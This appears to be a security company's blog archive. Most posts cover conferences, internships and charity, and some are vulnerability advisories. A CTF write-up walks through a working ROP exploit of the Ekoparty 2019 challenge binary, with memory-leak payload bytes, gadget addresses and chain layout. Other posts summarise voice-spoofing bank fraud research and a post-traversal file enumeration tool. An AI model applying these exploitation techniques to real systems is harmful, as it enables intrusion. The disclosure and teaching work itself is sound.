2017 Highlights, a great year and even greater things to come!

January 10, 2018, 4:10 am

≫ Next: Telspace Systems Security Advisory (TSA-2018-001)

As we enter a new year Telspace would like to look back on 2017 and thank everyone who made 2017 one of our greatest yet. We have had the pleasure of attending a number of conferences where we were able to present, train and share ideas with like-minded individuals. 2017 saw a growth in the Telspace Team, in particular in our Research and Development space (more to come!). This blog post provides an overview of some of the highlights this year, if we have missed anything let us know in the comments below! We kicked the year off by joining up with Carte Blanche to provide comment on mobile privacy and the tools used to spy on people.

Left to right: Stieler (Standard Bank), Bongani Bingwa (Carte Blanche), Simphiwe (PIC), Dino Covotsos (Telspace Systems)

Telspace has always been very close to the local infosec community and we believe in giving back. As part of this, Telspace got heavily involved in ITWeb’s first Hackathon where we provided our time to train, mentor and judge the participants. The inaugural Hackathon brought young professionals with an interest in developing their skills in Information Security together. The overall theme, “Innovation in Security”, challenged disruptive innovators to build the most secure systems possible, as well as to explore new innovative mechanisms for the industry.

The Hackaton was a great event / initiative as it made the participants aware of the importance of information security. Telspace also took on board one of the participants from the Hackathon that demonstrated the most passion, as we always like to say, we can teach you skills but we can’t teach you passion!

Left to right: Manny Corregedor (COO of Telspace Systems), Nithen Naidoo (CEO of Snode) at the Hackathon Ideathon

For more information on the Hackathon go to:

In addition to supporting the ITWeb Hackathon we also sponsored, provided training (ethical and wireless hacking) and spoke at the ITWeb Security Summit. We also got the opportunity to catchup with some old friends such as Jayson Street, an international speaker, that gave a keynote at the conference. We also made a donation to CANSA for every Telspace shirt that was given away to attendees that visited our stand.

Left to right: Eric Lundberg, Manny Corregedor and Jayson Street

Manny Corregedor giving a talk on ‘A false sense of information security’ at the ITWeb Security Summit.

The conference was well attended and had great international speakers such Jayson Street and Mati Aharoni who gave keynotes.

Telspace also attended the first local Johannesburg 0xCon conference where our COO Manny Corregedor presented his talk “Breaking AVs for fun and the greater good”. A great day was had by everyone and it was great seeing the community come together for this local conference.

Left to right (front): Manny, Mariska (No longer with Telspace), Sibusiso, Mark, Richard. Back: Eric.

Throughout the year we also participated in other local and international conferences, round table events and provided comments on news stories in the media.

In addition to supporting local events, we also attended Blackhat, Defcon 25 and Bsides in Las Vegas. Our analyst Richard Hocking gave a presentation on Hacking Stock Markets at BSides Las Vegas titled ‘(In)Outsider Trading - Hacking stocks using public information and influence.’

In Vegas many bonds were made and many beers were enjoyed. We look forward to attending again in 2018. We also donated to the fantastic Hackers for Charity, which is an amazing initiative which we fully support (Thanks Johnny!). More information on this great initiative can be found by going to: http://www.hackersforcharity.org/ .

Telspace also sponsored and presented at Bsides Cape Town 2017, where we were proud to run a “selfies for charity” fundraiser for the South African Depression and Anxiety Group (@TheSADAG). Our analyst Frank Allenby also presented his talk titled ‘Breach huffing; a culinary exploration of data breaches’.

Frank Allenby speaking at Bsides Cape Town

Our analyst Charlie Smith, also won the capture the flag competition at BSides Cape Town, the prize was a Google Home device, sponsored by NClose Security.

Charlie Smith receiving his prize for winning the CTF at BSides Cape Town

Some “selfies for charity” at BSides Cape Town 2017

For a complete write up on our experience at BSides Cape Town visit:

http://blog.telspace.co.za/2017/12/flux-capacitors-charged-and-back-to.html

This year we officially kicked off our security advisory service, Telspace Security Advisories (TSA), where we responsibly disclosed a number of unknown vulnerabilities (0day) to vendors. In 2018 we plan to continue our research in not only finding unknown vulnerabilities but also releasing research that would be valuable to our clients and more importantly the community as a whole - stay tuned :) Lastly, we would like to thank everyone who made our 2017 year so amazing, a huge thank you to our staff, clients, friends and most importantly the local Information Security community. We wish you all the best and a prosperous year for 2018.

↧

Telspace Systems Security Advisory (TSA-2018-001)

February 28, 2018, 1:30 am

≫ Next: Telspace Systems Security Advisory (TSA-2018-002)

≪ Previous: 2017 Highlights, a great year and even greater things to come!

Security Advisory

TSA-2018-001: Microsoft Access Information Disclosure Vulnerability

CVE Number: CVE-2018-0853

Summary

An information disclosure vulnerability exists when Microsoft Office Access software reads out of bound memory due to an uninitialized variable, which could disclose the contents of memory. An attacker who successfully exploited the vulnerability could view out of bound memory.

Details and crash information

VCRUNTIME140!memcpy+0x4e:

72edd1ce f3a4 rep movs byte ptr es:[edi],byte ptr [esi]

Vendor: Microsoft

Product: Access

Version: 16.0.8625.2127

Vendor URLs:

Vendor Response

The vendor has patched the vulnerability and released a new version.

Disclosure Timeline

23-11-2017 – Initial Discovery
25-11-2017 – Vendor Notification
19-01-2018 – Vendor Patch
13-02-2018 – Public Disclosure

Credit

This vulnerability was discovered by Dmitri Kaslov of Telspace Systems

↧

Telspace Systems Security Advisory (TSA-2018-002)

March 7, 2018, 3:05 am

≫ Next: Looking back on 2018 and forward to great things in 2019!

≪ Previous: Telspace Systems Security Advisory (TSA-2018-001)

Security Advisory

TSA-2018-002: Microsoft Edge Information Disclosure Vulnerability

CVE Number: CVE-2018-0839

Summary

An information disclosure vulnerability exists when Microsoft Edge improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user’s system.

Details and crash information

edgehtml!Ordinal125+0xe3c86:

5ef196d6 8b5928 mov ebx,dword ptr [ecx+28h] ds:0023:117cd008=????????

Vendor: Microsoft

Product: Edge

Version: 11.0.15063.67

Vendor URLs:

Vendor Response

The vendor has patched the vulnerability and released a new version

Disclosure Timeline

23-11-2017 – Initial Discovery
29-11-2017 – ZDI Notification
07-12-2017 - Vendor notification
21-02-2018 - Coordinated public release of advisory

Credit

This vulnerability was discovered by Dmitri Kaslov of Telspace Systems

↧

Looking back on 2018 and forward to great things in 2019!

January 9, 2019, 4:23 am

≫ Next: Telspace Systems Internship/Boot camp, March 2019

≪ Previous: Telspace Systems Security Advisory (TSA-2018-002)

As we enter a new year Telspace would like to look back on 2018 and thank everyone who made 2018 a great and exciting year. We have had the pleasure of attending a number of conferences where we were able to present, train and share ideas with like-minded individuals. This blog post provides an overview of some of the highlights this year, if we have missed anything let us know in the comments below!
We kicked the year off by hiring William Boshoff as our Chief Technical Officer (CTO), this was and still is part of our constant drive to continuously innovate and improve our services to clients. William believes that cultivating a culture of continual growth, learning and development directly translates into greater value for Telspace’s clients.
William’s experience ranges from assessing and consulting in high security environments, mostly in the finance and government sectors, through to lecturing and contributing as a subject matter expert on multiple boards.
In his spare time, William enjoys contributing to the information security community by sharing his research, mentoring and developing zero-day exploits.

William Boshoff (Telsace Systems CTO)

Telspace has also smashed international borders and expanded internationally to the UK, Egypt and Palestine! If you are interested and PASSIONATE, we are hiring!

Local is Lekker

Telspace has always been very close to the local (South African) infosec community and we believe in giving back. In line with this Telspace sponsored BSides Cape Town 2018, where we were proud to run a “selfies for charity” fundraiser for the South African Depression and Anxiety Group (@TheSADAG).

Telspace Crew at BSides Cape Town 2018 (left to right): Manny Corregedor, Derek Scott, Ayaz Saiyed

Some “selfies for charity” at BSides Cape Town 2018

Telspace also spoke at ITWeb’s Security Summit 2018, gave training (Ethical Hacking 101) and exhibited. Our CEO, Dino Covotsos and COO, Manny Corregedor, were both part of the advisory board for 2018. The conference was well attended and had great international speakers such as Mikko Hyppönen, April Wright, Jayson Street and Rodrigo Branco who gave keynotes.

We also got the opportunity to catchup with the international speakers who are old / good friends of Telspace Systems employees and made a charitable donation to CANSA for every Telspace t-shirt that was given away to attendees that visited our stand. We also exhibited at the Department of Defence supplier day which was well attended.

Left to right: Tarryn Hardman (Telspace Systems), Sibusiso Nxumalo (Former-Telspace Systems Employee), Rodrigo Branco (Intel), Manny Corregedor (Telspace Systems)

Left to right: Mikko Hyppönen (F-Secure), Dino Covotsos (Telspace Systems)

Manny Corregedor(Telspace Systems) giving a talk on ‘Information Security Cakes’ at the ITWeb Security Summit 2018

Telspace Systems Stand at the Department of Defence Supplier Day 2018

Going abroad!

Throughout the year we also participated in international conferences, round table events and provided comments on news stories in the media.
In addition to supporting local events, we also attended Blackhat, Defcon 26 and BSides in Las Vegas.
Our CEO Dino Covotsos also gave talks at:
Defcon 26 2018 – Recon Village (Las Vegas, USA)
Hack In The Box 2018 (Dubai)
Hackers to Hackers 2018, H2HC (Sao Paulo, Brazil)
Dino was also listed as one of the security researchers that was thanked by the Microsoft Security Response Center (MSRC) in recognition of making Microsoft online services safer by finding and reporting security vulnerabilities. More information at: https://www.microsoft.com/en-us/msrc/researcher-acknowledgments-online-services-archive

Dino Covotsos giving a talk on Hacking the RFQ Process at Hackers to Hackers (Brazil)

SACICON 2018 Badges
Left to right: Lukas Hermann (Blue Frost Security GmbH), Dino Covotsos (Telspace Systems), Rodrigo Branco (Intel)
Dino Covotsos giving a talk on Hacking the RFQ Process at Defcon 26 2018 – Recon Village (Las Vegas, USA)
Left to right: Jayson Street, Nina Alli and Dino Covotsos at SACICON (Brazil)

Hack In The Box 2018 (Dubai)

Dino Covotsos giving a talk on Hacking the RFQ Process at Hack In The Box 2018 (Dubai)

Thank you!

We would like to thank everyone who made our 2018 year so amazing, a huge thank you to our staff, clients, employees, friends and most importantly the local Information Security community. We wish you all the best and a prosperous year for 2019.

↧

Telspace Systems Internship/Boot camp, March 2019

March 5, 2019, 1:00 am

≫ Next: Put Words In My Mouth

≪ Previous: Looking back on 2018 and forward to great things in 2019!

We are excited and proud to announce that our boot camp / internship kicked off yesterday!

After approximately 100 thorough interviews, which covered a number of areas, we have secured 10 new interns. The areas we covered during the interview stage, to name a few were:

Networking, Linux, Windows, Software Development and Exploitation, Cryptography and general information security knowledge.

From a statistics perspective, the weakest area identified was cryptography (a future post on interview statistics is planned!)

We believe our internship / boot camp surpasses the industry “norm” due to the following reasons:

Our internships don’t have any monetary restraint attached to them and interns will be paid a monthly salary whilst they are undertaking the training with us, also, there are no restraints where the interns will have to pay back money if they don’t work for Telspace for a period of time. Doing anything else but this would only benefit the company itself, rather than the community.

If interns don’t feel they are a match at Telspace Systems during the boot camp, they are free to go, taking with them the knowledge that we passed on to them as well as any certifications (and we are more than happy with that!).

Should our interns pass the assessment criteria at the end of the boot camp, via different assessment gateways (including a research gateway), they will be offered a full-time junior analyst position at Telspace Systems (which they don’t have to take!), with this offer there will be additional training / certifications provided.

This boot camp is about growing the community, and thereafter, our company in order to service our customers better in the future.

We will be hosting a few more boot camp throughout the year, so keep your eyes peeled if you are interested in taking part in one!

Good luck to all our new interns, we hope to see many shells and calcs being popped!

↧

Put Words In My Mouth

May 1, 2019, 8:41 am

≫ Next: BSidesTLV - Proud Supporters

≪ Previous: Telspace Systems Internship/Boot camp, March 2019

Put Words In My Mouth | Telspace Systems Intern Research
By Amy Manià

Money has been withdrawn from your account.

You don’t remember making, or authorising that transaction.

When you follow up with the bank, they say you called earlier and requested the transfer – it was, after-all, you speaking – right? Unbeknownst to you, your voice was stolen, and so was your money.

With the rise of voice authentication biometrics, so too will the opportunities to spoof it. Text-to-Speech APIs are constantly improving, for example, Google’s technology is able to create voices that are indistinguishable from recordings made by the real-life human speaker.

Threat actors have access to a target’s voice recordings through passive channels such as YouTube videos, social media posts etc. More active / invasive channels an attacker could use would be to compromise vulnerable IoT devices which are becoming more common place throughout homes and offices. Social media posts and IoT devices would allow threat actors to listen to a voice, capture and then manipulate it (all using free online tools).

So what exactly can be done with a ‘stolen’ voice? This research explores the vulnerabilities in IoT devices, the legal landscape surrounding these devices and the various voice cloning, authentication and recognition software currently available. The report culminates by examining the possibilities of banking fraud, by using voice-spoofing to bypass authentication and transfer funds. The report includes a demonstration of the simulated attack on a bank.

Download the full Telspace Systems research paper here which was written by Amy:
https://github.com/telspacesystems/intern-research/blob/master/A%20MANIA%20-PUT%20WORDS%20IN%20MY%20MOUTH%20-%20FINAL(Voice%20Spoofing).pdf

↧

BSidesTLV - Proud Supporters

May 16, 2019, 12:46 am

≫ Next: Giving back - Child Survivors of Crime (C.S.O.C)

≪ Previous: Put Words In My Mouth

This year, Telspace Systems had a goal of giving back as much as we could to the information security community. This ranged from internships, research, free workshops, community based sponsorships and free training.

In line with this, we're very proud to announce that we'll be sponsoring BSides Tel Aviv 2019 (https://bsidestlv.com/), which will be hosted at Tel Aviv University, Israel. We are very proud of the local community in Israel, and are happy to be supporting our friends and colleagues through our sponsorship of the conference as well as providing our Ethical Hacking 101 training course.

It also gives us great pride and joy to announce that we will be giving back 100% of the proceeds of our workshop to the local BSides TLV community, which is in line with our 2019 goals. We hope to see more companies doing this in order to grow the information security space worldwide and give back as much as possible to our amazing industry.

For more information about our training that we will be offering in Tel Aviv, click here:

https://bsidestlv.com/workshops/ethical-hacking-101/ .

Registration for BSides TLV can completed at https://bsidestlv.com/register-2019/ .

We hope to see you there!

↧

Giving back - Child Survivors of Crime (C.S.O.C)

June 12, 2019, 1:59 am

≫ Next: TSA-2019-001: Asus Precision TouchPad 11.0.0.25 (Pool Overflow)

≪ Previous: BSidesTLV - Proud Supporters

Last month (May 2019) Telspace was once again a sponsor at the ITWeb Security Summit 2019, for more information on the ITWeb Security Summit refer to: http://v2.itweb.co.za/event/itweb/security-summit-2019/

In addition to sponsoring this local conference, Telspace proudly ran a charity initiative on the days of the summit whereby we gave out original Telspace branded t-shirts to delegates (with a twist).

Every year we donate an amount to a charity for each t-shirt we give out, this year that amount was R40.00 per shirt. However, we also decided to try and give back more to the chosen charity and had a donation box at the stand. If a delegate wanted a t-shirt, a small donation (of any value) was requested in return for the t-shirt. Amazingly, thanks to the generous delegates at the summit, the donations box raised R3 296.10 over the 2 days. We thank you all for your generous contributions to this amazing initiative.

The chosen charity for this year was Child Survivors of Crime (C.S.O.C). This wonderful charity creates a rainbow after the storm for children affected by crime. Support is individually tailored to the specific needs of each child because each one’s circumstances are unique. They offer this support via psychological, material, educational, peer and general assistance. Should you like more information on this charity and / or to assist in contributing in some way, please do not hesitate to view their website and get in touch by going to: http://childsurvivors.org.za/. This goes in line with one of our Junior Analyst's research topic for 2019 (Hi Delicia!).

In addition to the generous R3 296.10 raised, Telspace will be donating an additional R 8 000.00 (200 shirts x R40), making a total of R11 296.10 that will be donated to this amazing charity and initiative! We would like to say a huge thank you to all of the delegates that donated and participated in this initiative as well as our staff for getting involved!

It should be noted that the t-shirts contain a hidden challenge, if you received a t-shirt, find the challenge, solve it and play along to see where it may take you!

We would like to take this opportunity to once again say thank you to our staff, everyone that visited our stand and to everyone that showed support for Telspace Systems and in particular C.S.O.C. THANK YOU!

↧

TSA-2019-001: Asus Precision TouchPad 11.0.0.25 (Pool Overflow)

August 30, 2019, 1:00 am

≫ Next: Solving the BFS Ekoparty 2019 Exploitation Challenge

≪ Previous: Giving back - Child Survivors of Crime (C.S.O.C)

Telspace Systems Security Advisory

TSA-2019-001: Asus Precision TouchPad 11.0.0.25 (Pool Overflow)

CVE number: CVE-2019-10709

Summary:

The AsusPTPFilter.sys driver on the Asus Precision TouchPad 11.0.0.25 hardware has a Pool Overflow associated with the \\.\AsusTPdevice, leading to a DoS and could potentially lead to privilege escalation via a crafted DeviceIoControl call with a specific IOCTL code.

Vendor:

Asus

Product:

Asus Precision TouchPad

Version:

11.0.0.25

Vendor:

https://www.asus.com/us/News/SupportNews/

https://www.asus.com/

Proof of Concept:

https://github.com/telspacesystems/Asus-DOS

Details and crash information:

Vendor response:

The vendor has patched the vulnerability and released a new version.

Disclosure Timeline:

25-03-2019 – Initial Discovery

27-03-2019 – Vendor Notification

29-08-2019 – Vendor Patch

30-08-2019 – Public Disclosure

Credit:

This vulnerability was discovered by Athanasios Tserpelis of Telspace Systems

↧

Solving the BFS Ekoparty 2019 Exploitation Challenge

September 12, 2019, 12:07 pm

≫ Next: Travesty – A directory and file enumeration tool (post directory traversal exploitation)

≪ Previous: TSA-2019-001: Asus Precision TouchPad 11.0.0.25 (Pool Overflow)

This is a quick write up about how one of our team members, Thanasis, solved the challenge for EkoParty 2019. This was a fun challenge and thanks to Lukas and Nico from Blue Frost Security for making it happen(and for supporting our community).

More information about the challenge can be found at:

https://labs.bluefrostsecurity.de/blog/2019/09/07/bfs-ekoparty-2019-exploitation-challenge/

The application as the requirements provided, need to run in windows 10 x64 (RS6) version and the goal is to bypass ASLR and execute a calc.exe process .

By opening the application we can see via netstat that it binds on port 54321 on 0.0.0.0 (all the machine’s interfaces).

By opening Ghidra and going to the main function it is obvious that some checks need to bypassed in order to correctly send a payload to the application.

In Ghidra, if we check the function that is called after the new connection is accepted, we see this:

Upon first check, it checks for the first 0x10 bytes(16 chars) as a header.

The second and third checks: If the header starts with 0x393130326f6b45(Ekoparty2019) then we are allowed to send a user_message as long as it is smaller than 0x201 bytes(513 chars).

The last fourth check is quite important, we can send all this packet structure but it needs to be aligned correctly for 8 bytes. Meaning we could send 16,24,32 and so on.

After we succeed in sending a big buffer, it appears that the application crashes after 529 bytes or so. By sending 528 bytes structured correctly with the cookie included in the beginning, we notice that before the calling function sub_140001170, we actually control the RAX, which is the 513 bytes.

Before this, there is this instruction

lea rcx, unk_7FF6A8A9E520

unk_7FF6A8A9E520, holds an array with this structure

By sending the 513 characters, for example as A or \x41 we can make it so the function will return our byte + the rest of the pattern. In this case c3c3c3c3 + ourbyte+488b01.

The function sub_140001170 before it returns this value turns it to little endian, making it ourbyte+488b01c3c3c3c3. So we get 41488b01c3c3c3c3.

This value will be used in WriteProcessMemory as lpBuffer, basically copying these bytes to the function sub_7FF6A8A91000 as instructions allowing to control what we can execute when we reach it.

Although this is quite good, it provides a limitation of instructions, meaning we can only use instructions byte+488b01c3c3c3c3.

I made a quick script in python producing all the values in a file

byte=0x00

endbyte=0xff

start ="848b01c3c3c3"

for i in xrange(byte,endbyte+1):

print format(i,'X')+ start

With a one-liner bash I got all the values:

for i in $(cat list_instructions);do echo -e "\n$i"&& rasm2 -b 64 -D $i ; done > instructions

One good thing in this case is that we can actually control the RCX from our input buffer with the characters provided from 513 till 528.

The first thing I had to do was, get the process address from PEB.

By sending in our payload these are the last bytes:

“\x65\x65\x65\x65\x65\x65\x65\x65\x60\x00\x00\x00\x00\x00\x00\x00”

We could achieve and acquire the PEB. \x65 is meant for the combination from the previous instructions.

65488b01c3

0: 65 48 8b 01 mov rax,QWORD PTR gs:[rcx]
4: c3 ret

It is well known that in x64 bit windows, GS register is a special register which points to PEB by providing the accurate offset. In this case since we could control RCX, we pointer GS directly to the PEB which is at offset 0x60 hence the highlighting.

Since the application will always sends us back the data leaked we can get this address and use it.

The next step would be to get the Image Base Address of the application.

Image Base Address is located from the PEB + 0x10 offset. In this case we had to set the address + 0x10 as a pointer to RCX to be able to leak the address.

In this case, according to our possible instructions we chose:

0: 47 8b 01 mov rax,QWORD PTR [rcx]
3: c3 ret

The first byte 47 and these as before are the last bytes of our payload:

“\x47\x65\x65\x65\x65\x65\x65\x65 + address+0x10”

As an end goal we need to create a ROP chain to execute calc.exe.

Since we would like to bypass ASLR, leakage is already useful but in case we would need to execute something, we would have to bypass DEP as well.

In this case it is good that we have, in the beginning of the application, a winexec call.

Therefore, in the end we will call calc.exe through winexec but, winexec requires that the application will be executed to be pointed at, hence a pointer that points to the string calc.exe and a null terminator.

Somehow I had to be able to find that place in memory with my string. The best way was to get the StackBase Limit and get towards the stack base to find where it is.

First, I had to leak StackBase Limit.

StackBaseLimit is in the TEB at 0x10 offset through the GS register.

The initial request I used :

0: 65 48 8b 01 mov rax,QWORD PTR gs:[rcx]
4: c3 ret

I controlled the RCX by setting it to 0x10.

After actually getting the leaked address of the Stack Base Limit, it is time for a loop towards the Stack Base to find the correct string which would be calc.exe.

By doing a loop, I started leaking the memory cells of the stack up to a point where it detected my string.

The moment the string was found, I saved into a counter and multiplied by 0x08 to get how many cells down the stack I had to go.

So now I had the address of the string.

In the above scenario I used:

0: 47 8b 01 mov rax,QWORD PTR [rcx]
3: c3 ret

With RCX as the Stack Base Limit and constantly adding 0x08 to it.

The next step would be to get the winexec’s address on the stack. By checking the .rdata of the application I could see the offset of it.

In this case, I need to leak the address from Image Base Address + 0x9010 offset.

By using exactly the same instructions as before:

0: 47 8b 01 mov rax,QWORD PTR [rcx]
3: c3 ret

Then adding RCX as the Image Base Address+0x9010 , I get the leaked address for Winexec on the stack.

For the final request to the application I used

0: 51 push rcx
1: 48 8b 01 mov rax,QWORD PTR [rcx]
4: c3 ret

I set the RCX to a pivot gadget “add rsp,78h ; ret”, so I can stack pivot.

I used Ropper and rp++ to get gadgets out of the application.

Thankfully, the ret instruction gets us to a point in our buffer.

According to MSDN Wincalc requires 2 arguments, the name of the application and a number which will set the mode of the window.

In windows 10 x64 , the calling convention is rcx,rdx,r8,r9 and top of the stack.

The structure of the packet is this. The whole packet is the cookie + 528 characters.

Structure:

|16 junk bytes| - padding

|pop_rax_gadget| - Pop Image Base Address for having a valid address on RAX because the only pop rdx and pop rdx gadgets set bad values to it.

|Image Base Address – 0x08| - valid address

|pop_rdx_gadget| - pop rdx gadget to put 0x01 for the Wincalc second argument.

|0x01|- Winexec UINT uCmdShow

|pop_rax_gadget| - again for the same reason that the pop rcx gadget will set bad value to rax

|pop_rcx_gadget| - set the pointer address that points to calc.exe\x00

|address_pointing_calc| - address that points to calc.exe\x00

|72 junk bytes| - padding

|ret_gadget| - just a return gadget to fix the stack alignment to 16-byte format, because CreateProcessA is called inside the Winexec function which includes movabs instruction. Movabs instructions check if the stack is aligned and if not it will raise an exception.

|winexec_leaked_address| - winexec address on the stack.

|add_rsp_0x78| - adds to current RSP + 0x78 bytes to reach the next stack pivot.

|120 junk bytes| - padding.

|add_rsp_0x78| - adds to current RSP + 0x78 bytes to reach the next stack pivot.

|120 junk bytes| - padding.

|add_rsp_0x28| - adds to current RSP + 0x28 bytes to reach the next stack pivot.

|40 junk bytes| - padding.

|add_rsp_0x58| - adds to current RSP + 0x58 bytes to reach the original return pointer address and continue the execution of the application instead of crashing it.

|8 junk bytes| - padding.

|calc.exe\x00| - string to set in memory.

|15 junk bytes| - padding.

Gadgets Used:

0x14000158b: add rsp, 0x78 ; ret ;

0x0000000140004525: pop rdx; add byte ptr [rax], al; cmp word ptr [rax], cx; je 0x4530; xor eax, eax; ret;

0x140001167: pop rax ; ret ;

0x00000001400089ab: pop rcx; or byte ptr [rax], al; add byte ptr [rax - 0x77], cl; add eax, 0x4b12; add rsp, 0x48; ret;

0x0000000140001164: add rsp, 0x58; ret;

0x14000158f: ret ;

0x00000001400011d5: add rsp, 0x28; ret;

The full working exploit can be downloaded here from our Github:

https://github.com/telspacesystems/BFS-Ekoparty-2019-challenge/

Mandatory calc.exe POC screenshot:

↧

Travesty – A directory and file enumeration tool (post directory traversal exploitation)

November 5, 2019, 4:49 am

≫ Next: Boot Camp: 2020

≪ Previous: Solving the BFS Ekoparty 2019 Exploitation Challenge

About a year and a half ago, our team was working on an assessment where we had root access to a server via a directory traversal, but we couldn’t convert that to a working shell because of several restrictions on the server and a very strong password policy that was implemented i.e. /etc/shadow passwords could not be cracked during the assessment timeframe. We still knew that we had access to a very valuable target though.

It became quite difficult for us to progress on the assessment as we couldn’t see any files and directories on the server which may be unique, taking this into account Dino and Manny came up with the simple idea of downloading the mlocate database (since we had the required privileges luckily). The mlocate database is quite a mess if you open it directly in any text editor, but we were lucky enough to find pymlocate(https://github.com/salexan2001/pymlocate) which assisted us in obtaining a really neatly formatted file of directory structures on the target machine. Thanks to Alexander Schlemmer (salexan2001) for creating it.

We then created our own tool, called Travesty, which allowed us to automate the entire process, requiring just the vulnerable traversal URL and an output filename.

Utilising the tool has proved to be extremely useful over the course of this year on various assessments and it’s a great way to quickly find valuable information, files and directories on a target, that you wouldn’t normally know of on the machine.

We’ve decided to release the small script to the public, in order to assist analysts in their day to day jobs – if it even helps one security analyst, we’re happy!

We’ve released the tool on our Github at:

https://github.com/telspacesystems/travesty/

There’s a lot of work to be done and things that we want to add to it, but for now it does the job(just!).

Usage:

In action screenshot:

Output formatting:

Happy Hacking!

↧

Boot Camp: 2020

January 15, 2020, 11:34 pm

≫ Next: From Intern to OSCP Certified

≪ Previous: Travesty – A directory and file enumeration tool (post directory traversal exploitation)

Telspace has kicked off 2020 with a fresh intake of interns into our Boot Camp program. After approximately 100 grueling interviews, eight candidates were selected and invited to attend the Boot Camp. Congratulations to all that made it!

They are already knee-deep in the program, having submitted research proposals, completed assignments and braved their way through two simulated (CTF style) assessments!

We asked them for some feedback on their experience so far:

It's grueling, and I honestly don't know where my socks are when I wake up in the mornings anymore, but I'm loving every second of it - Rico

I think a bootcamp is a life changing experience, it's like a pressure cooker but in a good way. So here I am to get my hack on - Lorthar

I’m hooked on hacking, I love the community and culture in this industry. I’m grateful to be where I am now and very excited about my future, although I would definitly and obviously prefer Telspace above any other option as everything about it just fits perfectly - like its too good to be true! - Arno

Loving the Bootcamp so far, is like my second home– Thaba

I am super grateful to be at Telspace because Information Security is my passion - Edison

Being part of the internship is interesting because I get to improve on the knowledge I have while I could test my technical capabilities by exploiting system vulnerabilities - Thabiso

Cyber security plays an important part in our day to day life– Mothusi

For those interested in entering the industry, we will be hosting more boot camps in the future. If you would like to partake please get in touch with us!

In order to prepare yourself, the interview process covers some of the following topics: Networking, Linux, Windows, Cryptography, general information security knowledge, as well as Software Development and Exploitation. We are certain that our Boot Camp surpasses the industry “standard” thanks to the following:

• Our interns don’t have any monetary restraint attached to them, as they are paid a monthly salary whilst undertaking the training with us. Additionally, there are no restraints where the interns will have to pay back money if they do not end up working for Telspace at the end of the Boot Camp. Having an approach other than this would not benefit our newcomers to the industry, nor the community at large.

• If interns are uncertain that they are a good fit for the industry or at Telspace Systems during the boot camp, then they are free to leave at any time, taking what they have learnt with them, including any certifications (and we are more than happy with that!).

• Should our interns pass the strict criteria at the end of the boot camp, via different assessment gateways (including a research component and simulated penetration tests in various environments), then they will be offered a 6 month contract as a junior analyst with Telspace Systems (which they are not obliged to accept). If they do accept the offer, then further certifications and training will be provided by Telspace.

• This boot camp is about growing the information security community, and thereafter, our company; in order to provide our customers with the best possible service.

Telspace wishes each new intern the very best of luck; we are eager to see the wonderful research you complete as well as the many shells you will be popping!

↧

From Intern to OSCP Certified

February 18, 2020, 12:00 am

≫ Next: COVID-19 – Closed Offices

≪ Previous: Boot Camp: 2020

I received a delivery from DHL on Friday, and there was a distinct lump in my throat when I opened the package which contained that pristine white cardboard folder, holding MY OSCP certificate. I had dreamed of seeing my name on those silver letters - and now I did.

I posted a photograph of the certificate on my LinkedIn and received an overwhelming response. So many people were curious about how they too could complete the PWK course, or they wanted advice - or to know how I transition from being an Architect (the construction kind) to a Pentester.

There are many blogs about the OSCP, which provide tips and advice on the best way to tackle the course and approach the exam. I read many of them, and found them helpful - and I encourage anyone reading this to do the same.

I also want to state at the very beginning of this blog that I certainly do not claim to be an expert in any way whatsoever. I am continuously humbled by how much there is to learn, the people I have the privilege to work with, as well as the colleagues in this industry at large.

Everyone has their own story to tell, this is mine.

PRE-INTERNSHIP

I discovered Security somewhat by chance from someone who has a deep passion for their career as a penetration tester, and would speak about it constantly. Their level of enthusiasm was undeniable and I found it contagious - my curiosity had been piqued and I couldn't help myself - I wanted to know more... and that's the thing, its at that exact moment where it happens:

Security needs to grab a hold of you, and you have no urge to escape it...

(NOTE: This may seem like an obvious thing to say, but is an important part of the process, because if this is not your passion - you're going to have a very bad time.)

I had no background in IT whatsoever, and needed to start learning some basics. Like many others who find themselves interested in 'InfoSec', I started on the journey to find out more.

This process seems to have two main parts. On the one hand, I was pleasantly surprised to discover that many good-quality resources exist - mostly for free. Coming from a university background, I found it incredible that so many people had so freely given their knowledge away for others to learn. On the other hand, there was just SO much to learn - where on earth do you start?

My advice is: just start. Somewhere. Anywhere.

If you are like me, previously with very limited knowledge, everything will seem disjointed at first and you will feel like you're learning many different concepts in isolation... but KEEP AT IT! Eventually, slowly but surely - all of these little things will start to link up and become clearer as part of 'the bigger picture', and the satisfaction of those 'ah-ha' moments is unparalleled.

PRE-INTERNSHIP TLDR:

Start with learning the basics: Cybrary is a good place to start as well as Over The Wire war games.
Keep at it!

INTERNSHIP PART 1

Just like there is no 'right' way to start learning about security, there is no correct way to get started in the industry. Get onto Twitter, and tap into the massive community that is active there, find out about the Pentesting Companies in your country, local industry events, then network, talk to people and get involved.

After I had spent a few months doing self-study, I emailed Telspace Systems to introduce myself and ask for advice about how to get started in the industry. The response I received from Manual Corregedor informed me about an upcoming Internship program and asked if I would like to participate in an interview. Thankfully, the little bit of technical knowledge I had managed to gain (while running a full-time business of my own) meant I met the criteria, and was offered a position at the Boot Camp which started on 4 March 2019. As they say - the rest is history (with a lot of blood, sweat and tears involved)!

I am aware that a lot of people experience considerable barriers to entry. If this is the case - please do not give up. Please keep trying to find the place that fits you... and when you do find that place and start to make progress, please keep 'paying it forward'. This is a huge part of the Telspace Systems "mantra". As far as I am concerned - opening doors for others and giving back is a big part of the process. Security would not be the awesome industry that it is, if everyone kept their magic to themselves.

INTERNSHIP 1 TLDR:

Get involved with the community, until you can get your foot in the door.
Keep at it!

INTERNSHIP PART 2

The internship at Telspace Systems is simultaneously gruelling, and immense fun. The Boot Camp is designed to be high-pace, and really test potential analysts in a variety of ways.

I have been immensely lucky to receive training from world-class pen-testers, who I have the utmost respect for. The knowledge that is shared during an internship is priceless, and can vastly accelerate your learning experience.

It is however worth keeping in mind that (during an internship) all candidates are given the same information to learn, and opportunities for growth - but the rest is up to you! You have to spend time doing self study, because there is not a single pentester on earth who can hand-hold an intern/beginner the whole way through the process... and it would not make sense to either - learning HOW to google, and deal with unfamiliar situations is part of this job!

INTERNSHIP 2 TLDR:

Learn a much as you can, and make the most of your opportunities.
Keep at it!

Junior Analyst/OSCP

The interns who successfully complete a Telspace Systems Boot Camp, are offered a 6 month contract position, and are required to start with the Offensive Security Penetration Testing with Kali course immediately.

During these 6 months, the Juniors get to shadow analysts on assessments, complete their studies, conduct research, attend events and learn more about the industry. At the end of the 6 month period, every Junior Analyst needs to demonstrate excellence in multiple aspects in order to receive a permanent position here at Telspace Systems.

